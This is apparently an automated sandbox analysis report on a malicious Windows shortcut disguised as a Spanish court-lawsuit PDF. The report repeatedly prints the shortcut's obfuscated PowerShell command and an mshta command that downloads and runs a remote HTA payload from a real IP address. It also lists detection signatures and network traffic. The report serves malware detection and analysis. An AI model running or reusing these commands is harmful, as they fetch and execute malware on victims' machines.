Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DEMANDA JUICIO JUZGADO01.pdf.lnk

Overview

General Information

Sample name:DEMANDA JUICIO JUZGADO01.pdf.lnk
Analysis ID:1533039
MD5:06ce6c64dc6b0df8c484c55eafcaf2a8
SHA1:0b436093555e4e7f792c78a986b830954efbb964
SHA256:514cbb6ac8f92bbc548a0612d1bce1bf3cca5f3e70c0245ad1e1a72d7936e492
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Obfuscated command line found
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7516 cmdline: "C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 7836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, ProcessId: 7292, ProcessName: powershell.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta, CommandLine: "C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7292, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta, ProcessId: 7516, ProcessName: mshta.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, ProcessId: 7292, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;, ProcessId: 7292, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7836, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-14T11:05:40.365769+020020244491Attempted User Privilege Gain192.168.2.54972694.154.172.16680TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: DEMANDA JUICIO JUZGADO01.pdf.lnkReversingLabs: Detection: 45%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: DEMANDA JUICIO JUZGADO01.pdf.lnkJoe Sandbox ML: detected

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.5:49726 -> 94.154.172.166:80
Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
Source: global trafficHTTP traffic detected: GET /pczt/royyyas.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.154.172.166Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 94.154.172.166
Source: unknownTCP traffic detected without corresponding DNS query: 94.154.172.166
Source: unknownTCP traffic detected without corresponding DNS query: 94.154.172.166
Source: unknownTCP traffic detected without corresponding DNS query: 94.154.172.166
Source: unknownTCP traffic detected without corresponding DNS query: 94.154.172.166
Source: global trafficHTTP traffic detected: GET /pczt/royyyas.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.154.172.166Connection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.1
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.15
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.1
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.17
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.1
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.16
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/p
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pc
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pcz
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/r
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/ro
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/roy
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royy
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyy
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyya
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.h
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.ht
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC2B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3400850119.000001CEAC240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.hta
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.hta...
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.hta...ory
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.hta3
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.hta5
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.htaC:
Source: mshta.exe, 00000003.00000002.3400946587.000001CEAC260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.htaH
Source: mshta.exe, 00000003.00000002.3400850119.000001CEAC240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.hta_BROWSER_AP5;
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.154.172.166/pczt/royyyas.htata
Source: svchost.exe, 00000006.00000002.3402795586.0000017611E8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.2242575824.00000256ECD87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE57C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2221482929.00000256DE521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2221482929.00000256DCBD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.2221482929.00000256DE521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2221482929.00000256DCBD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2445301976.0000017611C80000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000000.00000002.2221482929.00000256DE521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2247853489.00000256F4E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros-
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000000.00000002.2242575824.00000256ECD87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE57C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: DEMANDA JUICIO JUZGADO01.pdf.lnkLNK file: -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.';&(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)]));^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)]));foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]};*% $i;
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal92.evad.winLNK@5/9@0/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cibrx2n2.yuc.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: DEMANDA JUICIO JUZGADO01.pdf.lnkReversingLabs: Detection: 45%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;
